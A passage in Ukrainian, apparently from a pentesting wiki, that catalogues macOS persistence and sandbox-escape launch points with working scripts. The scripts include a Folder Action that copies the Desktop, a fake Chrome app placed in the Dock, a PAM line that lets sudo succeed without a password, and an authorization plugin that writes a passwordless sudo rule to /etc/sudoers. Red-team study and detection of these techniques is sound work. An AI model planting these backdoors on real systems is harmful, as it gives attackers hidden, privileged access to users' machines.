видалення елементів або інші дії, такі як відкриття або зміна розміру вікна папки. Ці дії можуть бути використані для різних завдань і можуть бути запущені різними способами, такими як використання інтерфейсу Finder або команд терміналу. Щоб налаштувати Дії папок, у вас є кілька варіантів: 1. Створення робочого процесу Дії папок за допомогою [Automator](https://support.apple.com/guide/automator/welcome/mac) та встановлення його як служби. 2. Прикріплення скрипта вручну через Налаштування Дій папок у контекстному меню папки. 3. Використання OSAScript для надсилання повідомлень Apple Event до `System Events.app` для програмного налаштування Дії папок. * Цей метод особливо корисний для вбудовування дії в систему, пропонуючи рівень стійкості. The following script is an example of what can be executed by a Folder Action: ```applescript // source.js var app = Application.currentApplication(); app.includeStandardAdditions = true; app.doShellScript("touch /tmp/folderaction.txt"); app.doShellScript("touch ~/Desktop/folderaction.txt"); app.doShellScript("mkdir /tmp/asd123"); app.doShellScript("cp -R ~/Desktop /tmp/asd123"); ``` Щоб зробити вищезазначений скрипт придатним для Дій Папки, скомпілюйте його за допомогою: ```bash osacompile -l JavaScript -o folder.scpt source.js ``` Після компіляції скрипта налаштуйте Дії папок, виконавши нижче наведений скрипт. Цей скрипт дозволить Дії папок глобально та специфічно прикріпить раніше скомпільований скрипт до папки Робочий стіл. ```javascript // Enabling and attaching Folder Action var se = Application("System Events"); se.folderActionsEnabled = true; var myScript = se.Script({name: "source.js", posixPath: "/tmp/source.js"}); var fa = se.FolderAction({name: "Desktop", path: "/Users/username/Desktop"}); se.folderActions.push(fa); fa.scripts.push(myScript); ``` Запустіть скрипт налаштування за допомогою: ```bash osascript -l JavaScript /Users/username/attach.scpt ``` * Це спосіб реалізації цієї стійкості через GUI: Це скрипт, який буде виконано: {% code title="source.js" %} ```applescript var app = Application.currentApplication(); app.includeStandardAdditions = true; app.doShellScript("touch /tmp/folderaction.txt"); app.doShellScript("touch ~/Desktop/folderaction.txt"); app.doShellScript("mkdir /tmp/asd123"); app.doShellScript("cp -R ~/Desktop /tmp/asd123"); ``` {% endcode %} Скомпілюйте його за допомогою: `osacompile -l JavaScript -o folder.scpt source.js` Перемістіть його до: ```bash mkdir -p "$HOME/Library/Scripts/Folder Action Scripts" mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts" ``` Тоді відкрийте додаток `Folder Actions Setup`, виберіть **папку, яку ви хочете спостерігати** і виберіть у вашому випадку **`folder.scpt`** (в моєму випадку я назвав його output2.scp):
Тепер, якщо ви відкриєте цю папку за допомогою **Finder**, ваш скрипт буде виконано. Ця конфігурація зберігалася в **plist**, розташованому в **`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** у форматі base64. Тепер спробуємо підготувати цю стійкість без доступу до GUI: 1. **Скопіюйте `~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** до `/tmp`, щоб зробити резервну копію: * `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp` 2. **Видаліть** дії папок, які ви тільки що налаштували:
Тепер, коли у нас є порожнє середовище 3. Скопіюйте резервний файл: `cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/` 4. Відкрийте Folder Actions Setup.app, щоб використати цю конфігурацію: `open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"` {% hint style="danger" %} І це не спрацювало для мене, але це інструкції з опису:( {% endhint %} ### Ярлики Dock Опис: [https://theevilbit.github.io/beyond/beyond\_0027/](https://theevilbit.github.io/beyond/beyond\_0027/) * Корисно для обходу пісочниці: [✅](https://emojipedia.org/check-mark-button) * Але вам потрібно мати встановлений шкідливий додаток у системі * Обхід TCC: [🔴](https://emojipedia.org/large-red-circle) #### Місцезнаходження * `~/Library/Preferences/com.apple.dock.plist` * **Тригер**: Коли користувач натискає на додаток у доку #### Опис та експлуатація Усі програми, які з'являються в Dock, вказані в plist: **`~/Library/Preferences/com.apple.dock.plist`** Можна **додати програму** просто з: {% code overflow="wrap" %} ```bash # Add /System/Applications/Books.app defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/System/Applications/Books.app_CFURLStringType0' # Restart Dock killall Dock ``` {% endcode %} Використовуючи деякі **соціальні інженерії**, ви могли б **видавати себе, наприклад, за Google Chrome** всередині доку і насправді виконати свій власний скрипт: ```bash #!/bin/sh # THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON) rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null # Create App structure mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS mkdir -p /tmp/Google\ Chrome.app/Contents/Resources # Payload to execute echo '#!/bin/sh open /Applications/Google\ Chrome.app/ & touch /tmp/ImGoogleChrome' > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome # Info.plist cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist CFBundleExecutable Google Chrome CFBundleIdentifier com.google.Chrome CFBundleName Google Chrome CFBundleVersion 1.0 CFBundleShortVersionString 1.0 CFBundleInfoDictionaryVersion 6.0 CFBundlePackageType APPL CFBundleIconFile app EOF # Copy icon from Google Chrome cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns # Add to Dock defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/tmp/Google Chrome.app_CFURLStringType0' killall Dock ``` ### Колірні вибірники Writeup: [https://theevilbit.github.io/beyond/beyond\_0017](https://theevilbit.github.io/beyond/beyond\_0017/) * Корисно для обходу пісочниці: [🟠](https://emojipedia.org/large-orange-circle) * Потрібно, щоб відбулася дуже специфічна дія * Ви опинитеся в іншій пісочниці * Обхід TCC: [🔴](https://emojipedia.org/large-red-circle) #### Локація * `/Library/ColorPickers` * Потрібен root * Тригер: Використовуйте колірний вибірник * `~/Library/ColorPickers` * Тригер: Використовуйте колірний вибірник #### Опис та експлуатація **Скомпілюйте пакет** колірного вибірника з вашим кодом (ви можете використати [**цей, наприклад**](https://github.com/viktorstrate/color-picker-plus)) і додайте конструктор (як у розділі [Захисник екрану](macos-auto-start-locations.md#screen-saver)) та скопіюйте пакет до `~/Library/ColorPickers`. Тоді, коли колірний вибірник буде активовано, ваш код також повинен бути активований. Зверніть увагу, що двійковий файл, що завантажує вашу бібліотеку, має **дуже обмежену пісочницю**: `/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64` {% code overflow="wrap" %} ```bash [Key] com.apple.security.temporary-exception.sbpl [Value] [Array] [String] (deny file-write* (home-subpath "/Library/Colors")) [String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers")) [String] (allow file-read* (extension "com.apple.app-sandbox.read")) ``` {% endcode %} ### Finder Sync Plugins **Writeup**: [https://theevilbit.github.io/beyond/beyond\_0026/](https://theevilbit.github.io/beyond/beyond\_0026/)\ **Writeup**: [https://objective-see.org/blog/blog\_0x11.html](https://objective-see.org/blog/blog\_0x11.html) * Корисно для обходу пісочниці: **Ні, тому що вам потрібно виконати свій власний додаток** * Обхід TCC: ??? #### Місцезнаходження * Конкретний додаток #### Опис та експлуатація Приклад програми з розширенням Finder Sync [**можна знайти тут**](https://github.com/D00MFist/InSync). Додатки можуть мати `Finder Sync Extensions`. Це розширення буде входити в додаток, який буде виконуватись. Більше того, щоб розширення могло виконати свій код, воно **повинно бути підписане** дійсним сертифікатом розробника Apple, воно повинно бути **пісочницею** (хоча можуть бути додані пом'якшені винятки) і воно повинно бути зареєстроване з чимось на зразок: ```bash pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex pluginkit -e use -i com.example.InSync.InSync ``` ### Екранна заставка Writeup: [https://theevilbit.github.io/beyond/beyond\_0016/](https://theevilbit.github.io/beyond/beyond\_0016/)\ Writeup: [https://posts.specterops.io/saving-your-access-d562bf5bf90b](https://posts.specterops.io/saving-your-access-d562bf5bf90b) * Корисно для обходу пісочниці: [🟠](https://emojipedia.org/large-orange-circle) * Але ви опинитеся в загальній пісочниці додатків * Обхід TCC: [🔴](https://emojipedia.org/large-red-circle) #### Локація * `/System/Library/Screen Savers` * Потрібен root * **Тригер**: Виберіть екранну заставку * `/Library/Screen Savers` * Потрібен root * **Тригер**: Виберіть екранну заставку * `~/Library/Screen Savers` * **Тригер**: Виберіть екранну заставку
#### Опис та експлуатація Створіть новий проект в Xcode і виберіть шаблон для генерації нової **екранної заставки**. Потім додайте свій код, наприклад, наступний код для генерації логів. **Зберігайте** його, і скопіюйте пакет `.saver` до **`~/Library/Screen Savers`**. Потім відкрийте GUI екранної заставки, і якщо ви просто натиснете на неї, вона повинна згенерувати багато логів: {% code overflow="wrap" %} ```bash sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "hello_screensaver"' Timestamp (process)[PID] 2023-09-27 22:55:39.622369+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver void custom(int, const char **) 2023-09-27 22:55:39.622623+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView initWithFrame:isPreview:] 2023-09-27 22:55:39.622704+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView hasConfigureSheet] ``` {% endcode %} {% hint style="danger" %} Зверніть увагу, що через те, що всередині прав, наданих бінарному файлу, який завантажує цей код (`/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver`), ви можете знайти **`com.apple.security.app-sandbox`**, ви будете **всередині загального пісочниці додатків**. {% endhint %} Saver code: ```objectivec // // ScreenSaverExampleView.m // ScreenSaverExample // // Created by Carlos Polop on 27/9/23. // #import "ScreenSaverExampleView.h" @implementation ScreenSaverExampleView - (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview { NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); self = [super initWithFrame:frame isPreview:isPreview]; if (self) { [self setAnimationTimeInterval:1/30.0]; } return self; } - (void)startAnimation { NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); [super startAnimation]; } - (void)stopAnimation { NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); [super stopAnimation]; } - (void)drawRect:(NSRect)rect { NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); [super drawRect:rect]; } - (void)animateOneFrame { NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); return; } - (BOOL)hasConfigureSheet { NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); return NO; } - (NSWindow*)configureSheet { NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); return nil; } __attribute__((constructor)) void custom(int argc, const char **argv) { NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); } @end ``` ### Spotlight Plugins writeup: [https://theevilbit.github.io/beyond/beyond\_0011/](https://theevilbit.github.io/beyond/beyond\_0011/) * Корисно для обходу пісочниці: [🟠](https://emojipedia.org/large-orange-circle) * Але ви опинитеся в пісочниці програми * Обхід TCC: [🔴](https://emojipedia.org/large-red-circle) * Пісочниця виглядає дуже обмеженою #### Location * `~/Library/Spotlight/` * **Тригер**: Створено новий файл з розширенням, яке обробляється плагіном Spotlight. * `/Library/Spotlight/` * **Тригер**: Створено новий файл з розширенням, яке обробляється плагіном Spotlight. * Потрібен root * `/System/Library/Spotlight/` * **Тригер**: Створено новий файл з розширенням, яке обробляється плагіном Spotlight. * Потрібен root * `Some.app/Contents/Library/Spotlight/` * **Тригер**: Створено новий файл з розширенням, яке обробляється плагіном Spotlight. * Потрібен новий додаток #### Description & Exploitation Spotlight — це вбудована функція пошуку macOS, призначена для надання користувачам **швидкого та всебічного доступу до даних на їхніх комп'ютерах**.\ Щоб полегшити цю швидку можливість пошуку, Spotlight підтримує **приватну базу даних** і створює індекс, **аналізуючи більшість файлів**, що дозволяє швидко шукати як за іменами файлів, так і за їх вмістом. Основний механізм Spotlight включає центральний процес, названий 'mds', що означає **'сервер метаданих'.** Цей процес координує всю службу Spotlight. Доповнюючи це, є кілька демонів 'mdworker', які виконують різноманітні завдання обслуговування, такі як індексація різних типів файлів (`ps -ef | grep mdworker`). Ці завдання стають можливими завдяки плагінам імпортера Spotlight, або **".mdimporter bundles**", які дозволяють Spotlight розуміти та індексувати вміст у різноманітних форматах файлів. Плагіни або **`.mdimporter`** пакети розташовані в місцях, згаданих раніше, і якщо з'являється новий пакет, він завантажується протягом хвилини (немає потреби перезапускати будь-яку службу). Ці пакети повинні вказувати, які **типи файлів та розширення вони можуть обробляти**, таким чином, Spotlight використовуватиме їх, коли створюється новий файл з вказаним розширенням. Можливо **знайти всі `mdimporters`**, які завантажені, запустивши: ```bash mdimport -L Paths: id(501) ( "/System/Library/Spotlight/iWork.mdimporter", "/System/Library/Spotlight/iPhoto.mdimporter", "/System/Library/Spotlight/PDF.mdimporter", [...] ``` І, наприклад, **/Library/Spotlight/iBooksAuthor.mdimporter** використовується для парсингу таких типів файлів (розширення `.iba` та `.book` серед інших): ```json plutil -p /Library/Spotlight/iBooksAuthor.mdimporter/Contents/Info.plist [...] "CFBundleDocumentTypes" => [ 0 => { "CFBundleTypeName" => "iBooks Author Book" "CFBundleTypeRole" => "MDImporter" "LSItemContentTypes" => [ 0 => "com.apple.ibooksauthor.book" 1 => "com.apple.ibooksauthor.pkgbook" 2 => "com.apple.ibooksauthor.template" 3 => "com.apple.ibooksauthor.pkgtemplate" ] "LSTypeIsPackage" => 0 } ] [...] => { "UTTypeConformsTo" => [ 0 => "public.data" 1 => "public.composite-content" ] "UTTypeDescription" => "iBooks Author Book" "UTTypeIdentifier" => "com.apple.ibooksauthor.book" "UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor" "UTTypeTagSpecification" => { "public.filename-extension" => [ 0 => "iba" 1 => "book" ] } } [...] ``` {% hint style="danger" %} Якщо ви перевірите Plist інших `mdimporter`, ви можете не знайти запис **`UTTypeConformsTo`**. Це тому, що це вбудовані _Уніфіковані Ідентифікатори Типів_ ([UTI](https://en.wikipedia.org/wiki/Uniform\_Type\_Identifier)), і не потрібно вказувати розширення. Більше того, плагіни за замовчуванням системи завжди мають пріоритет, тому зловмисник може отримати доступ лише до файлів, які не індексуються власними `mdimporters` Apple. {% endhint %} Щоб створити свій власний імпортер, ви можете почати з цього проекту: [https://github.com/megrimm/pd-spotlight-importer](https://github.com/megrimm/pd-spotlight-importer) і потім змінити назву, **`CFBundleDocumentTypes`** та додати **`UTImportedTypeDeclarations`**, щоб він підтримував розширення, яке ви хочете підтримувати, і відобразити їх у **`schema.xml`**.\ Потім **змініть** код функції **`GetMetadataForFile`**, щоб виконати ваш payload, коли створюється файл з обробленим розширенням. Нарешті, **зберіть і скопіюйте ваш новий `.mdimporter`** в одне з трьох попередніх місць, і ви можете перевірити, чи він завантажується, **моніторячи журнали** або перевіряючи **`mdimport -L.`** ### ~~Панель налаштувань~~ {% hint style="danger" %} Схоже, що це більше не працює. {% endhint %} Запис: [https://theevilbit.github.io/beyond/beyond\_0009/](https://theevilbit.github.io/beyond/beyond\_0009/) * Корисно для обходу пісочниці: [🟠](https://emojipedia.org/large-orange-circle) * Потрібна специфічна дія користувача * Обхід TCC: [🔴](https://emojipedia.org/large-red-circle) #### Місцезнаходження * **`/System/Library/PreferencePanes`** * **`/Library/PreferencePanes`** * **`~/Library/PreferencePanes`** #### Опис Схоже, що це більше не працює. ## Обхід пісочниці Root {% hint style="success" %} Тут ви можете знайти місця запуску, корисні для **обходу пісочниці**, які дозволяють вам просто виконати щось, **записуючи це у файл**, будучи **root** і/або вимагаючи інших **незвичайних умов.** {% endhint %} ### Періодичний Запис: [https://theevilbit.github.io/beyond/beyond\_0019/](https://theevilbit.github.io/beyond/beyond\_0019/) * Корисно для обходу пісочниці: [🟠](https://emojipedia.org/large-orange-circle) * Але вам потрібно бути root * Обхід TCC: [🔴](https://emojipedia.org/large-red-circle) #### Місцезнаходження * `/etc/periodic/daily`, `/etc/periodic/weekly`, `/etc/periodic/monthly`, `/usr/local/etc/periodic` * Потрібен root * **Тригер**: Коли настане час * `/etc/daily.local`, `/etc/weekly.local` або `/etc/monthly.local` * Потрібен root * **Тригер**: Коли настане час #### Опис та експлуатація Періодичні скрипти (**`/etc/periodic`**) виконуються через **демони запуску**, налаштовані в `/System/Library/LaunchDaemons/com.apple.periodic*`. Зверніть увагу, що скрипти, збережені в `/etc/periodic/`, **виконуються** як **власник файлу**, тому це не спрацює для потенційного підвищення привілеїв. {% code overflow="wrap" %} ```bash # Launch daemons that will execute the periodic scripts ls -l /System/Library/LaunchDaemons/com.apple.periodic* -rw-r--r-- 1 root wheel 887 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-daily.plist -rw-r--r-- 1 root wheel 895 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-monthly.plist -rw-r--r-- 1 root wheel 891 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-weekly.plist # The scripts located in their locations ls -lR /etc/periodic total 0 drwxr-xr-x 11 root wheel 352 May 13 00:29 daily drwxr-xr-x 5 root wheel 160 May 13 00:29 monthly drwxr-xr-x 3 root wheel 96 May 13 00:29 weekly /etc/periodic/daily: total 72 -rwxr-xr-x 1 root wheel 1642 May 13 00:29 110.clean-tmps -rwxr-xr-x 1 root wheel 695 May 13 00:29 130.clean-msgs [...] /etc/periodic/monthly: total 24 -rwxr-xr-x 1 root wheel 888 May 13 00:29 199.rotate-fax -rwxr-xr-x 1 root wheel 1010 May 13 00:29 200.accounting -rwxr-xr-x 1 root wheel 606 May 13 00:29 999.local /etc/periodic/weekly: total 8 -rwxr-xr-x 1 root wheel 620 May 13 00:29 999.local ``` {% endcode %} Є й інші періодичні скрипти, які будуть виконані, вказані в **`/etc/defaults/periodic.conf`**: ```bash grep "Local scripts" /etc/defaults/periodic.conf daily_local="/etc/daily.local" # Local scripts weekly_local="/etc/weekly.local" # Local scripts monthly_local="/etc/monthly.local" # Local scripts ``` Якщо вам вдасться записати будь-який з файлів `/etc/daily.local`, `/etc/weekly.local` або `/etc/monthly.local`, він буде **виконаний рано чи пізно**. {% hint style="warning" %} Зверніть увагу, що періодичний скрипт буде **виконаний від імені власника скрипта**. Тому, якщо звичайний користувач є власником скрипта, він буде виконаний від імені цього користувача (це може запобігти атакам підвищення привілеїв). {% endhint %} ### PAM Writeup: [Linux Hacktricks PAM](../linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md)\ Writeup: [https://theevilbit.github.io/beyond/beyond\_0005/](https://theevilbit.github.io/beyond/beyond\_0005/) * Корисно для обходу пісочниці: [🟠](https://emojipedia.org/large-orange-circle) * Але вам потрібно бути root * Обхід TCC: [🔴](https://emojipedia.org/large-red-circle) #### Місцезнаходження * Завжди потрібен root #### Опис та експлуатація Оскільки PAM більше зосереджений на **постійності** та шкідливому ПЗ, ніж на легкому виконанні в macOS, цей блог не надасть детального пояснення, **читайте написання, щоб краще зрозуміти цю техніку**. Перевірте модулі PAM за допомогою: ```bash ls -l /etc/pam.d ``` Техніка постійності/ескалації привілеїв, що зловживає PAM, така ж проста, як модифікація модуля /etc/pam.d/sudo, додавши на початку рядок: ```bash auth sufficient pam_permit.so ``` Отже, це буде **виглядати** приблизно так: ```bash # sudo: auth account password session auth sufficient pam_permit.so auth include sudo_local auth sufficient pam_smartcard.so auth required pam_opendirectory.so account required pam_permit.so password required pam_deny.so session required pam_permit.so ``` І тому будь-яка спроба використати **`sudo` буде успішною**. {% hint style="danger" %} Зверніть увагу, що цей каталог захищений TCC, тому ймовірно, що користувач отримає запит на доступ. {% endhint %} Ще один хороший приклад - це su, де ви можете побачити, що також можливо передавати параметри модулям PAM (і ви також можете закласти бекдор у цей файл): ```bash cat /etc/pam.d/su # su: auth account session auth sufficient pam_rootok.so auth required pam_opendirectory.so account required pam_group.so no_warn group=admin,wheel ruser root_only fail_safe account required pam_opendirectory.so no_check_shell password required pam_opendirectory.so session required pam_launchd.so ``` ### Authorization Plugins Writeup: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)\ Writeup: [https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65](https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65) * Корисно для обходу пісочниці: [🟠](https://emojipedia.org/large-orange-circle) * Але вам потрібно бути root і зробити додаткові налаштування * TCC обход: ??? #### Location * `/Library/Security/SecurityAgentPlugins/` * Потрібен root * Також потрібно налаштувати базу даних авторизації для використання плагіна #### Description & Exploitation Ви можете створити плагін авторизації, який буде виконуватись, коли користувач входить в систему, щоб підтримувати постійність. Для отримання додаткової інформації про те, як створити один з цих плагінів, перегляньте попередні звіти (і будьте обережні, погано написаний може заблокувати вас, і вам потрібно буде очистити ваш mac з режиму відновлення). ```objectivec // Compile the code and create a real bundle // gcc -bundle -framework Foundation main.m -o CustomAuth // mkdir -p CustomAuth.bundle/Contents/MacOS // mv CustomAuth CustomAuth.bundle/Contents/MacOS/ #import __attribute__((constructor)) static void run() { NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded"); system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers"); } ``` **Перемістіть** пакет до місця, звідки його потрібно завантажити: ```bash cp -r CustomAuth.bundle /Library/Security/SecurityAgentPlugins/ ``` Нарешті додайте **правило** для завантаження цього плагіна: ```bash cat > /tmp/rule.plist < class evaluate-mechanisms mechanisms CustomAuth:login,privileged EOF security authorizationdb write com.asdf.asdf < /tmp/rule.plist ``` **`evaluate-mechanisms`** скаже фреймворку авторизації, що йому потрібно **викликати зовнішній механізм для авторизації**. Більше того, **`privileged`** змусить його виконуватися від імені root. Запустіть його за допомогою: ```bash security authorize com.asdf.asdf ``` І тоді **група staff повинна мати доступ sudo** (прочитайте `/etc/sudoers`, щоб підтвердити). ### Man.conf Writeup: [https://theevilbit.github.io/beyond/beyond\_0030/](https://theevilbit.github.io/beyond/beyond\_0030/) * Корисно для обходу пісочниці: [🟠](https://emojipedia.org/large-orange-circle) * Але вам потрібно бути root, і користувач повинен використовувати man * Обхід TCC: [🔴](https://emojipedia.org/large-red-circle) #### Місцезнаходження * **`/private/etc/man.conf`** * Потрібен root * **`/private/etc/man.conf`**: Коли використовується man #### Опис та експлуатація Конфігураційний файл **`/private/etc/man.conf`** вказує на двійковий файл/скрипт, який потрібно використовувати при відкритті файлів документації man. Тому шлях до виконуваного файлу може бути змінений, так що щоразу, коли користувач використовує man для читання документації, виконується бекдор. Наприклад, встановлено в **`/private/etc/man.conf`**: ``` MANPAGER /tmp/view ``` А потім створіть `/tmp/view` як: ```bash #!/bin/zsh touch /tmp/manconf /usr/bin/less -s ``` ### Apache2 **Writeup**: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/) * Корисно для обходу пісочниці: [🟠](https://emojipedia.org/large-orange-circle) * Але вам потрібно бути root, і apache має бути запущений * Обхід TCC: [🔴](https://emojipedia.org/large-red-circle) * Httpd не має прав #### Location * **`/etc/apache2/httpd.conf`** * Потрібен root * Тригер: Коли Apache2 запускається #### Description & Exploit Ви можете вказати в `/etc/apache2/httpd.conf`, щоб завантажити модуль, додавши рядок, наприклад: {% code overflow="wrap" %} ```bash LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority" ``` {% endcode %} Таким чином, ваш скомпільований модуль буде завантажено Apache. Єдине, що вам потрібно, це **підписати його дійсним сертифікатом Apple**, або вам потрібно **додати новий довірений сертифікат** в систему і **підписати його** з ним. Тоді, якщо потрібно, щоб переконатися, що сервер буде запущено, ви можете виконати: ```bash sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist ``` Приклад коду для Dylb: ```objectivec #include #include __attribute__((constructor)) static void myconstructor(int argc, const char **argv) { printf("[+] dylib constructor called from %s\n", argv[0]); syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]); } ``` ### BSM audit framework Writeup: [https://theevilbit.github.io/beyond/beyond\_0031/](https://theevilbit.github.io/beyond/beyond\_0031/) * Корисно для обходу пісочниці: [🟠](https://emojipedia.org/large-orange-circle) * Але вам потрібно бути root, auditd має працювати і викликати попередження * TCC обход: [🔴](https://emojipedia.org/large-red-circle) #### Location * **`/etc/security/audit_warn`** * Потрібен root * **Trigger**: Коли auditd виявляє попередження #### Description & Exploit Коли auditd виявляє попередження, скрипт **`/etc/security/audit_warn`** є **виконаним**. Тож ви можете додати свій payload до нього. ```bash echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn ``` Ви можете примусити попередження за допомогою `sudo audit -n`. ### Елементи запуску {% hint style="danger" %} **Це застаріло, тому нічого не повинно бути знайдено в цих каталогах.** {% endhint %} **StartupItem** - це каталог, який повинен бути розташований або в `/Library/StartupItems/`, або в `/System/Library/StartupItems/`. Після створення цього каталогу він повинен містити два специфічні файли: 1. **rc скрипт**: shell-скрипт, що виконується під час запуску. 2. **plist файл**, спеціально названий `StartupParameters.plist`, який містить різні налаштування конфігурації. Переконайтеся, що як rc скрипт, так і файл `StartupParameters.plist` правильно розміщені в каталозі **StartupItem**, щоб процес запуску міг їх розпізнати та використовувати. {% tabs %} {% tab title="StartupParameters.plist" %} ```xml Description This is a description of this service OrderPreference None Provides superservicename ``` {% endtab %} {% tab title="суперсервісназва" %} ```bash #!/bin/sh . /etc/rc.common StartService(){ touch /tmp/superservicestarted } StopService(){ rm /tmp/superservicestarted } RestartService(){ echo "Restarting" } RunService "$1" ``` {% endtab %} {% endtabs %} ### ~~emond~~ {% hint style="danger" %} Я не можу знайти цей компонент у моєму macOS, тому для отримання додаткової інформації перевірте опис {% endhint %} Опис: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/) Введений Apple, **emond** є механізмом ведення журналу, який, здається, недорозроблений або, можливо, покинутий, але залишається доступним. Хоча це не особливо корисно для адміністратора Mac, ця невідома служба може слугувати тонким методом стійкості для зловмисників, ймовірно, непоміченим більшістю адміністраторів macOS. Для тих, хто знає про його існування, виявлення будь-якого зловмисного використання **emond** є простим. LaunchDaemon системи для цієї служби шукає скрипти для виконання в єдиному каталозі. Щоб перевірити це, можна використовувати наступну команду: ```bash ls -l /private/var/db/emondClients ``` ### ~~XQuartz~~ Writeup: [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/) #### Location * **`/opt/X11/etc/X11/xinit/privileged_startx.d`** * Потрібен root * **Тригер**: З XQuartz #### Description & Exploit XQuartz **більше не встановлений в macOS**, тому, якщо вам потрібна додаткова інформація, перегляньте опис. ### ~~kext~~ {% hint style="danger" %} Встановити kext навіть як root настільки складно, що я не розглядатиму це як спосіб втечі з пісочниць або навіть для постійності (якщо у вас немає експлойту) {% endhint %} #### Location Щоб встановити KEXT як елемент автозавантаження, його потрібно **встановити в одне з наступних місць**: * `/System/Library/Extensions` * KEXT файли, вбудовані в операційну систему OS X. * `/Library/Extensions` * KEXT файли, встановлені стороннім програмним забезпеченням Ви можете перерахувати в даний момент завантажені kext файли за допомогою: ```bash kextstat #List loaded kext kextload /path/to/kext.kext #Load a new one based on path kextload -b com.apple.driver.ExampleBundle #Load a new one based on path kextunload /path/to/kext.kext kextunload -b com.apple.driver.ExampleBundle ``` Для отримання додаткової інформації про [**розширення ядра перевірте цей розділ**](macos-security-and-privilege-escalation/mac-os-architecture/#i-o-kit-drivers). ### ~~amstoold~~ Запис: [https://theevilbit.github.io/beyond/beyond\_0029/](https://theevilbit.github.io/beyond/beyond\_0029/) #### Місцезнаходження * **`/usr/local/bin/amstoold`** * Потрібен root #### Опис та експлуатація Очевидно, що `plist` з `/System/Library/LaunchAgents/com.apple.amstoold.plist` використовував цей бінарний файл, відкриваючи XPC сервіс... справа в тому, що бінарний файл не існував, тому ви могли розмістити щось там, і коли XPC сервіс буде викликаний, ваш бінарний файл буде викликаний. Я більше не можу знайти це у своєму macOS. ### ~~xsanctl~~ Запис: [https://theevilbit.github.io/beyond/beyond\_0015/](https://theevilbit.github.io/beyond/beyond\_0015/) #### Місцезнаходження * **`/Library/Preferences/Xsan/.xsanrc`** * Потрібен root * **Тригер**: Коли сервіс запускається (рідко) #### Опис та експлуатація Очевидно, що не дуже поширено запускати цей скрипт, і я навіть не зміг знайти його у своєму macOS, тому якщо ви хочете більше інформації, перевірте запис. ### ~~/etc/rc.common~~ {% hint style="danger" %} **Це не працює в сучасних версіях MacOS** {% endhint %} Також можливо розмістити тут **команди, які будуть виконані під час запуску.** Приклад звичайного скрипту rc.common: ```bash # # Common setup for startup scripts. # # Copyright 1998-2002 Apple Computer, Inc. # ###################### # Configure the shell # ###################### # # Be strict # #set -e set -u # # Set command search path # PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; export PATH # # Set the terminal mode # #if [ -x /usr/bin/tset ] && [ -f /usr/share/misc/termcap ]; then # TERM=$(tset - -Q); export TERM #fi ################### # Useful functions # ################### # # Determine if the network is up by looking for any non-loopback # internet network interfaces. # CheckForNetwork() { local test if [ -z "${NETWORKUP:=}" ]; then test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l) if [ "${test}" -gt 0 ]; then NETWORKUP="-YES-" else NETWORKUP="-NO-" fi fi } alias ConsoleMessage=echo # # Process management # GetPID () { local program="$1" local pidfile="${PIDFILE:=/var/run/${program}.pid}" local pid="" if [ -f "${pidfile}" ]; then pid=$(head -1 "${pidfile}") if ! kill -0 "${pid}" 2> /dev/null; then echo "Bad pid file $pidfile; deleting." pid="" rm -f "${pidfile}" fi fi 